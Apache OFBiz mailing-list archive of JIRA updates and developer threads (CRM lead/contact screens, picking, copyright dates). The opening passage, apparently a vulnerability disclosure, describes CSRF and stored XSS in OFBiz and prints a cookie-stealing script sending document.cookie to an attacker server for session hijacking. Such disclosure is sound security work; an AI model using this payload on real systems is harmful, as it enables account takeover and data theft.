as the following > innocuous one: > > > action="https://127.0.0.1:8443/catalog/control/createProduct";> > > > > > > document.xsrf.submit(); > Of course the product-creation mechanism is not finished (we need price, > content and ProductName), > but is just to let you understand. > When this JS code will be present in a malicious page (opened by a new tab of > the same browser - not Chrome ahah), > his content will be automatically executed and the POST request will be sent > to the application: the product with Id=hack02 > will be persisted inside the DB. Of course a valid party must be logged in > the catalog module, in a way > that the global JSESSIONID cookie value will be the same in every tab of the > browser. > Clearly we can do more than this... > 2.: As most of the Ofbiz forms are vulnerable to XSS, some reflected and some > stored, > exploit them is quite easy: we will exploited only stored ones. > We can for instance replace the value of internalName (that even if it is a > needed > parameter is quite un-useful and so prone to store our malicious code) with > something > like: > > > value="alert(document.cookie)"> > > The malicious code will display every cookie information in a pop-up, that > only the victim > will see: obviously we don't want this. > 3.: We can then create a little cookie-grabber servlet that listen for GET > request from > our victims, extract the useful parameters and store them in a file or DB, in > a way > that wen can hijack the session of the admin/manager. > > The internalName value is prone to store our malicious code also because his > maxlength > is 255 characters: this gives us a great advantage when creating a complex > injection code, > if we don't want to inject a link to the malicious script like > http://x.x.x.x/malicious.js";> > > The malicious code will look as the following one: > > > var > str="http://ourHackServer/CookieWebServlet?cookie="+document.cookie+"&url="+document.URL; > > if(document.cookie.indexOf("done")<0)\{ > document.cookie="done=true"; > document.location.replace(str); > } > > > Of course the code can be a lot shorter, and the "already-exploited-check" > can be removed. > > After we have a valid JSESSIONID, if we open a browser, go to the grabbed URL > (remember document.URL) that will be an > authentication-required resource, the login page will ask us for valid > credentials. > In Opera (or Firefox with AnEC Cookie Editor plugin) we
[jira] Updated: (OFBIZ-1151) Passwords are not seeded
[ https://issues.apache.org/jira/browse/OFBIZ-1151?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux updated OFBIZ-1151: --- Issue Type: Sub-task (was: Improvement) Parent: OFBIZ-1525 > Passwords are not seeded > > > Key: OFBIZ-1151 > URL: https://issues.apache.org/jira/browse/OFBIZ-1151 > Project: OFBiz > Issue Type: Sub-task > Components: party >Affects Versions: Release Branch 4.0, SVN trunk >Reporter: Wickersheimer Jeremy >Assignee: Jacques Le Roux >Priority: Minor > > Password are currently hashed but not seeded which may be a security issue. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-2373) Improvements in "Lead" Screens
[ https://issues.apache.org/jira/browse/OFBIZ-2373?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Parimal Gain updated OFBIZ-2373: Attachment: SfaLeadImprovements.patch Implemented the functionality of lead. > Improvements in "Lead" Screens > -- > > Key: OFBIZ-2373 > URL: https://issues.apache.org/jira/browse/OFBIZ-2373 > Project: OFBiz > Issue Type: Sub-task > Components: marketing >Affects Versions: SVN trunk >Reporter: Ashish Vijaywargiya >Priority: Minor > Fix For: SVN trunk > > Attachments: SfaLeadImprovements.patch > > > Lead should be treated as combination of both Person & PartyGroup. (Related > by PartyRelationship). Lead can be directly converted to Accounts & Contacts. > This can be done either Duplicating the existing record or by adding > "Account" & "Contact" role in the "PartyRole" entity. > Left Navigation Section : There will be following link / section present in > left side.There will be two block in the left section similar to catalog. > 1) Shortcuts > 2) Quick Add Lead > Shorcuts block contains following link : > - Create Lead - Exists, modification required. > - Create Lead from vCard - Exists. > - Find Lead - Exists, Modification required. > Quick Add Lead block will be used as it is. > Right side will be the content area (body section). > Implementation Details : > 1) Modification in Create Lead : > a) Add Few more fields.The sequence of the fields will be (R - Required) : > Fields from Person Entity : First Name (R), Last Name (R), Gender, Birth > Date, Social Security Number, Occupation. > Fields from Party Group Entity : Group Name(R) (Use "Company Name") , Office > Site Name (Use "Website" on GUI), Annual Revenue, Number of Employees, Ticker > Symbol. > Remove the fields from Existing form : Suffix, Title. > Lets do one more thing here. Provide Check Box titled "Existing Company Name" > (Default Unchecked) and provide all the fields from the Party Group as it is. > And if user select that check box then use the existing Party Group record. > Provide the Party Group lookup to search the existing group. > b) Modify the Lead Source Field : > Create few records in Data Source Entity by type "LEAD_SOURCE" (or something > similar) and use them here in combo box instead of existing text field. The > IDs for the record can be Cold Call, Existing Customer, Self Generated, > Employee, Partner, Public Relations, Direct Mail, Conference, Trade Show, Web > Site, Word of Mouth, Email, Campaign, Other etc. Handling of this field in > Service Implementation should be improved accordingly. > c) Modification in General Correspondence address : Remove the field Address > Field 2 from the form. Instead of this use Separate Block to have "Other > Correspondence Address" block and provide all the fields there. (Similar > thing that we do in Ecommerce application for Billing & Shipping Address). > d) Inside "Quick Add Lead" block make the "Group Name" field as the required > one. > 2) Modification in Find Lead Screen : > a) For now search is happening on the basis of partyTypeId = "PERSON". But we > should improve this search. In the modified version the search will be based > on either partyTypeId="PARTY_GROUP" or partyTypeId ="PERSON". And all the > records will be returned that will have roleTypeId = "LEAD" (Applies on Party > record when we create lead) or "ACCOUNT_LEAD" (Applies on Party_Group record > when we create lead).We can also provide constraint to check > PartyRelationShip record to join "ACCOUNT_LEAD" (Party_Group) with "LEAD" and > then return the result accordingly. > b) The search result form will contain one more field titled "Email Address" > 3) Modification on Summary Section : > a) If you are looking record of partyTypeId ="Person" then associated > Party_Group will be shown with that. > b) But if you are looking record for partyTypeId ="Party_Group" then > associated party record will be shown below in tabular form and we should > provide option to update each record. > c) The list of all the Work Efforts(Activities/ Event & Tasks) associated > with the Party.Provide option to associate the existing work effort record > with the party. Create/Update & Delete form. > 4) Merge Leads functionality is broken. Please check it and fix it. > Rest of the functionality should be tested. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-2372) Improvements in "Contact" Screens
[ https://issues.apache.org/jira/browse/OFBIZ-2372?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] awdesh singh parihar updated OFBIZ-2372: Attachment: SfaContact.patch -- Implemented all functionality given in requirement except 1.b requirement -- For requirement 3.a i didn't use ajax i used simple process to implement this functionality. Thanks --Awdesh Parihar > Improvements in "Contact" Screens > - > > Key: OFBIZ-2372 > URL: https://issues.apache.org/jira/browse/OFBIZ-2372 > Project: OFBiz > Issue Type: Sub-task > Components: marketing >Affects Versions: SVN trunk >Reporter: Ashish Vijaywargiya >Priority: Minor > Fix For: SVN trunk > > Attachments: SfaContact.patch > > > Contact should be treated as a Person. Each contact will be in Contact role. > Each contact should be associated with the Party_Group in the "Account" role > throught a PartyRelationShip record by partyRelationshipTypeId being > "Parent_Account". > Left Navigation Section : There will be following link / section present in > left side. There will be two block in the left section similar to catalog. > 1) Shortcuts > 2) Quick Add Contact > Shorcuts block contains following link : > - Create Contact - Exists, modification required. > - Create Contact from vCard. > - Find Contacts - Exists, Modification required. > Quick Add Contact : This block will be used as it is. > Right side will be the content area (body section). > 1) Modification in Create Contact : > a) Add Few more fields.The sequence of the fields will be (R - Required) : > Fields from Person Entity : First Name (R), Last Name (R), Gender, Birth > Date, Social Security Number, Occupation. > Fields from Party Group Entity : Group Name(R) (Use "Company Name") , Office > Site Name (Use "Website" on GUI), Annual Revenue, Number of Employees, Ticker > Symbol. > b) Modification in General Correspondence address : Remove the field Address > Field 2 from the form. Instead of this use Separate Block to have "Other > Correspondence Address" block and provide all the fields there. (Similar > thing that we do in Ecommerce application for Billing & Shipping Address). > 2) Modification in Find Contact Screen : > a) Search the records that has partyTypeId ="Person" and has > roleTypeId="Contact" > b) Remove the Party Id field from the find form. > c) The search result form will contain one more field titled "Email Address". > d) For providing easy navigation to the user change Party Id field link to > Edit button. Also remove the Party ID label from the top. As we have changed > it to Edit link. > 3) Modification on Summary Section : > a) Add the screenlet section that will contain the Accounts associated with > this contact. Also Provide small form at the bottom of account list to add > the other accounts on the existing list. For this provide one lookup to > search contacts (Account i.e "Party_Group" in the role of "Account") and then > submit button. If we do this through Ajax(Using Prototype Library) then it > would be good. The Contact should be associated with Party Group through > Party Relationship by partyRelationshipTypeId being "Parent_Account". > b) Remove the Party Attribute block for now. It won't make any sense to me > for now. > Rest of the functionality in the Contacts header should be tested properly. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
Re: svn commit: r772941 - in /ofbiz/trunk: framework/common/webcommon/includes/fo/ framework/webtools/webapp/webtools/entity/ specialpurpose/ecommerce/webapp/ecommerce/includes/ specialpurpose/webpos/
I have finally reverted r772941 at r773211
To be consistent, I have replaced 2009 by ${nowTimestamp?string("")} in specialpurpose/cmssite/template/ofbiz/ofbizFooter.ftl at
r773216
If someone is interested, I did not take the time to think about
ModelInfo.java
ModelWriter.jsp
ModelInduceFromDb.jsp
Jacques
From: "Jacques Le Roux"
I had a look, in US seems to be 95 or 120 years in our case <>
What is less clear to me is if a release is a publication and if creation is
begining with Undersun or Apache Era (I guess Apache
Era)... Moreover things are not the same in EU, etc.
Headache :/
I think you are right David. We should simplify our work and use automatic date
copyright generation for all artifacts generated.
If someone has a better understanding of all these things please chime in, I
give up!
Jacques
From: "Jacques Le Roux"
From: "David E Jones"
Yes, we do need an end date (or not start date). Copyright protection has a
limited time period, I believe something like 10
years for things like this. Because of that copyright holders have an
incentive to update the copyright date as they release
new editions.
In EU seems to be 70 years (IANAL), anyway I understand why people update the
copyright now. But are we sure that a new edition
allows to break the 10-70 years ?
Again, please keep in mind the difference between a copyright message for a
specific file in the project, and a copyright
message that represents that output generated by the system (which copyright
is typically customized when the system is
deployed, BTW).
I see the difference, but is this legal ? What does it means ? If OFBiz is
still used in 2100 but not updated since 2050, this
means that the generated outputs are still protected but not the software
itself !?
The files changed here are for the copyright statements which cover generated
output, so the substantial change issue is
satisfied, and in fact it has nothing to do with it because each page
generated is a unique work and not tied to a previous
page.
Are you sure we legally able to differentiate the work (OFBiz) and its
generated outputs ?
In the headers for each file in the project what really should happen is that
people update the copyright date when they make
substantial changes to each file. Trying to remember that and keep track of it
is not terribly likely and is a real pain as
another thing on top of dozens already for people to remember.
I have already forgotten, what were you speaking about ? ;p
The best solution for those headers (which again has nothing to do with this
particular commit) is probably to do a review once
a year of all files with more than X lines (probably 5-10) of changes, and
then update the headers on those (if they haven't
already been updated).
Yes sounds like a good policy
Jacques
-David
On May 8, 2009, at 9:49 AM, Jacques Le Roux wrote:
Also I (we?) have not checked this rule
http://www.law.cornell.edu/treaties/berne/overview.html . I just tried but did
not find
anything obvious...
Some links
http://itlaw.wikia.com/wiki/Copyright_duration
http://en.wikipedia.org/wiki/Copyright#Duration
http://en.wikipedia.org/wiki/Directive_on_harmonising_the_term_of_copyright_protection#Duration_of_protection
Finally I wonder now if we really need to put and end date there...!
Maybe David Goodenough can enlighten us ?
Jacques
From: "David E Jones"
Subject: Re: svn commit: r772941 - in /ofbiz/trunk: framework/common/
webcommon/includes/fo/
framework/webtools/webapp/webtools/entity/
specialpurpose/ecommerce/webapp/ecommerce/includes/ specialpurpose/
webpos/webapp/webpos/includes/ themes/flatgrey/includes/ themes...
I think we should undo this change. The dynamic dates represented here do not
copyright the files that the code is in, they
copyright what the code produces, and that is constantly changing so the
dynamic date is appropriate.
-David
On May 8, 2009, at 5:15 AM, jler...@apache.org wrote:
Author: jleroux
Date: Fri May 8 11:15:08 2009
New Revision: 772941
URL: http://svn.apache.org/viewvc?rev=772941&view=rev
Log:
See http://markmail.org/message/znytl2y4inpmxbdo (David Goodenough's advice
on copyright update)
extract : "My understanding of the Berne Convention rules for Copyright
(which covers most jurisdictions - even the USA
now), is that the copyright period only gets extended when the copyrighted item
gets updated."
Modified:
ofbiz/trunk/framework/common/webcommon/includes/fo/basic- footer.fo.ftl
ofbiz/trunk/framework/webtools/webapp/webtools/entity/ EntityRefReport.fo.ftl
ofbiz/trunk/specialpurpose/ecommerce/webapp/ecommerce/includes/ footer.ftl
ofbiz/trunk/specialpurpose/webpos/webapp/webpos/includes/ Footer.ftl
ofbiz/trunk/themes/flatgrey/includes/footer.ftl
ofbiz/trunk/themes/multiflex/includes/footer.ftl
Modified: ofbiz/trunk/framework/common/webcommon/includes/fo/ basic-
footer.fo.ftl
URL:
http://svn.apache.org/viewvc/ofbi
[jira] Updated: (OFBIZ-2448) Add an Axis2 component to the framework
[ https://issues.apache.org/jira/browse/OFBIZ-2448?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux updated OFBIZ-2448: --- Description: This is part of a [work initiated by Alfredo Rueda|http://docs.ofbiz.org/x/oR4] and continued by Paul Piper. When the component will be integrated the document above should updated (there are some issues with the current attached file) was:This is part of a [work initiated by Alfredo Rueda|http://docs.ofbiz.org/x/oR4] and continued by Paul Piper. > Add an Axis2 component to the framework > --- > > Key: OFBIZ-2448 > URL: https://issues.apache.org/jira/browse/OFBIZ-2448 > Project: OFBiz > Issue Type: New Feature > Components: framework >Affects Versions: SVN trunk >Reporter: Jacques Le Roux >Assignee: Jacques Le Roux > Fix For: SVN trunk > > > This is part of a [work initiated by Alfredo > Rueda|http://docs.ofbiz.org/x/oR4] and continued by Paul Piper. > When the component will be integrated the document above should updated > (there are some issues with the current attached file) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Created: (OFBIZ-2448) Add an Axis2 component to the framework
Add an Axis2 component to the framework --- Key: OFBIZ-2448 URL: https://issues.apache.org/jira/browse/OFBIZ-2448 Project: OFBiz Issue Type: New Feature Components: framework Affects Versions: SVN trunk Reporter: Jacques Le Roux Assignee: Jacques Le Roux Fix For: SVN trunk This is part of a [work initiated by Alfredo Rueda|http://docs.ofbiz.org/x/oR4] and continued by Paul Piper. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Created: (OFBIZ-2447) Add an ant "clean-tempfiles" target in main build.xml
Add an ant "clean-tempfiles" target in main build.xml - Key: OFBIZ-2447 URL: https://issues.apache.org/jira/browse/OFBIZ-2447 Project: OFBiz Issue Type: New Feature Components: ALL COMPONENTS Affects Versions: SVN trunk Reporter: Jacques Le Roux Priority: Trivial Fix For: SVN trunk This target should be called by the "clean-all" target -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Created: (OFBIZ-2446) Functionality to mark an order viewed
Functionality to mark an order viewed - Key: OFBIZ-2446 URL: https://issues.apache.org/jira/browse/OFBIZ-2446 Project: OFBiz Issue Type: New Feature Components: order Affects Versions: SVN trunk Reporter: Pranay Pandey Fix For: SVN trunk *Implementation Notes* # Add indicator on OrderHeader and a checkbox on the orderdetail page in the Order Manager that shows and sets the flag. # For implementing above point Ajax request for a new service "markOrderViewed" should be called which will update order header to set the new filed "isViewed" in OrderHeader entity. # Initially the check box should be shown with label "Mark Viewed" and once user selects it will be converted into "Viewed" : Yes -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Closed: (OFBIZ-2388) Add a page that shows orders with the "pick sheet printed date" field
[ https://issues.apache.org/jira/browse/OFBIZ-2388?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vikas Mayur closed OFBIZ-2388. -- Resolution: Fixed Thanks Arun and others! Arun your second patch is in trunk rev. 773185. Vikas > Add a page that shows orders with the "pick sheet printed date" field > - > > Key: OFBIZ-2388 > URL: https://issues.apache.org/jira/browse/OFBIZ-2388 > Project: OFBiz > Issue Type: Sub-task > Components: product >Affects Versions: SVN trunk >Reporter: Pranay Pandey >Assignee: Vikas Mayur > Fix For: SVN trunk > > Attachments: ofbiz-2388.patch, ofbiz-2388.patch > > > * Add page that shows orders with the "pick sheet printed date" field set > that do not have a Shipment associated with them that is in the "Input" or > "Scheduled" statuses (should be in Input status, but just in case Scheduled > is eventually used), sorted by the oldest date first to see the ones that > have gone the longest without being picked and verified. > * Link to new page from the PicklistOptions page. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-2388) Add a page that shows orders with the "pick sheet printed date" field
[ https://issues.apache.org/jira/browse/OFBIZ-2388?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Arun Patidar updated OFBIZ-2388: Attachment: ofbiz-2388.patch Here is improved patch according to David's suggestions. I improved following:- 1) Applied conditions during fetching records from OrderHeader entity. 2) Checked entry in ItemIssuance entity for shipment association instead from Shipment entity. > Add a page that shows orders with the "pick sheet printed date" field > - > > Key: OFBIZ-2388 > URL: https://issues.apache.org/jira/browse/OFBIZ-2388 > Project: OFBiz > Issue Type: Sub-task > Components: product >Affects Versions: SVN trunk >Reporter: Pranay Pandey >Assignee: Vikas Mayur > Fix For: SVN trunk > > Attachments: ofbiz-2388.patch, ofbiz-2388.patch > > > * Add page that shows orders with the "pick sheet printed date" field set > that do not have a Shipment associated with them that is in the "Input" or > "Scheduled" statuses (should be in Input status, but just in case Scheduled > is eventually used), sorted by the oldest date first to see the ones that > have gone the longest without being picked and verified. > * Link to new page from the PicklistOptions page. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Created: (OFBIZ-2445) Show Billing Account Info on the Party Profile
Show Billing Account Info on the Party Profile
--
Key: OFBIZ-2445
URL: https://issues.apache.org/jira/browse/OFBIZ-2445
Project: OFBiz
Issue Type: Improvement
Components: party
Affects Versions: SVN trunk
Reporter: Pranay Pandey
Fix For: SVN trunk
Show Billing Account Info and returns as well to show outstanding returns on
the Party Profile
There is a Financial History ("Fin. History") tab on the profile in the Party
Manager but it only contains information about invoice and payments. Add
information about Billing Account(s) and available credit on this page. Add
section about returns as well to show outstanding returns with status.
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.
Re: SOA + EDA
From: "Ashish Vijaywargiya" forkwlow - New word ;o) Indeed, I must have been tired. Ha! the famous http://www.mrc-cbu.cam.ac.uk/people/matt.davis/Cmabrigde/ Thanks Jacques I guess it is workflow ;) I guess you can add the details there and if someone might be having any objection then they will point you to move somewhere else. Then you can ask the place to put the details ;o) -- Ashish On Sat, May 9, 2009 at 3:51 AM, Jacques Le Roux < jacques.le.r...@les7arts.com> wrote: I'd like to put a section in "Is OFBiz for Me" page for briefly explaining how the OFBiz EDA (events driven architecture) works (what ECAs are in OFBiz) and why no forkwlow engines is used in OFBiz but ECAs. This question come from time to time and IMO it's not too technical to be exposed there. WDYT ? Jacques
[jira] Commented: (OFBIZ-2436) Improvement in Verify Pick screen to issue items as well when shipment is created
[ https://issues.apache.org/jira/browse/OFBIZ-2436?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12707640#action_12707640 ] Akash Jain commented on OFBIZ-2436: --- Thanks Vikas :) Regards -- Akash Jain > Improvement in Verify Pick screen to issue items as well when shipment is > created > - > > Key: OFBIZ-2436 > URL: https://issues.apache.org/jira/browse/OFBIZ-2436 > Project: OFBiz > Issue Type: Sub-task > Components: product >Affects Versions: SVN trunk >Reporter: Pranay Pandey >Assignee: Vikas Mayur >Priority: Minor > Fix For: SVN trunk > > Attachments: ItemIssuance.patch, ItemIssuance.patch > > > Improvement in Verify Pick screen to issue items as well when shipment is > created in Picked status: > # When shipment is created and marked PICKED should also be issued items > (ItemIssuance) > # Once order items are verified on this screen, Packing screen should use the > same shipment created. > # Also reduce code for Packing which has to be moved to Very Pick now. > *The process will be:* > # Create a sales order with 4 to 5 items. > # Go to Facility-->Verify Pick, enter orderId and very order items. > # After all items are verified shipment should be created in PICKED status, > invoice will be generated in INVOICE_IN_PROCESS along with item issuance. > # Now go Facility-->Packing, enter verified oderId and complete pack, now > this process will utilize the same shipment, invoice created in Verify Pick > process only status of shipment will be changed to PACKED after completion. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Commented: (OFBIZ-2444) webtools import errors when a currency specific value includes a thousands delimiter USD
[ https://issues.apache.org/jira/browse/OFBIZ-2444?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12707633#action_12707633 ] BJ Freeman commented on OFBIZ-2444: --- So the question is for a solution. do require all input to be deviod of delimiters, other than the decimal place so no change to code. or do we add functionality to replace the comma before sending the string to the numberformatter. I would prefer a solution more like the second one. also remove currency symbols. as part of the string operations. > webtools import errors when a currency specific value includes a thousands > delimiter USD > > > Key: OFBIZ-2444 > URL: https://issues.apache.org/jira/browse/OFBIZ-2444 > Project: OFBiz > Issue Type: Bug > Components: framework >Affects Versions: Release Branch 9.04, SVN trunk >Reporter: BJ Freeman > Fix For: Release Branch 9.04, SVN trunk > > > and entity field defined as > > when imported with a comma for thousands > 1,199.95 > gives this error > The Following Errors Occurred: > ERROR: Error parsing entity xml file: java.lang.NumberFormatException -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
Re: SOA + EDA
forkwlow - New word ;o) I guess it is workflow ;) I guess you can add the details there and if someone might be having any objection then they will point you to move somewhere else. Then you can ask the place to put the details ;o) -- Ashish On Sat, May 9, 2009 at 3:51 AM, Jacques Le Roux < jacques.le.r...@les7arts.com> wrote: > I'd like to put a section in "Is OFBiz for Me" page for briefly explaining > how the OFBiz EDA (events driven architecture) works (what ECAs are in > OFBiz) and why no forkwlow engines is used in OFBiz but ECAs. > This question come from time to time and IMO it's not too technical to be > exposed there. > > > WDYT ? > > Jacques > >
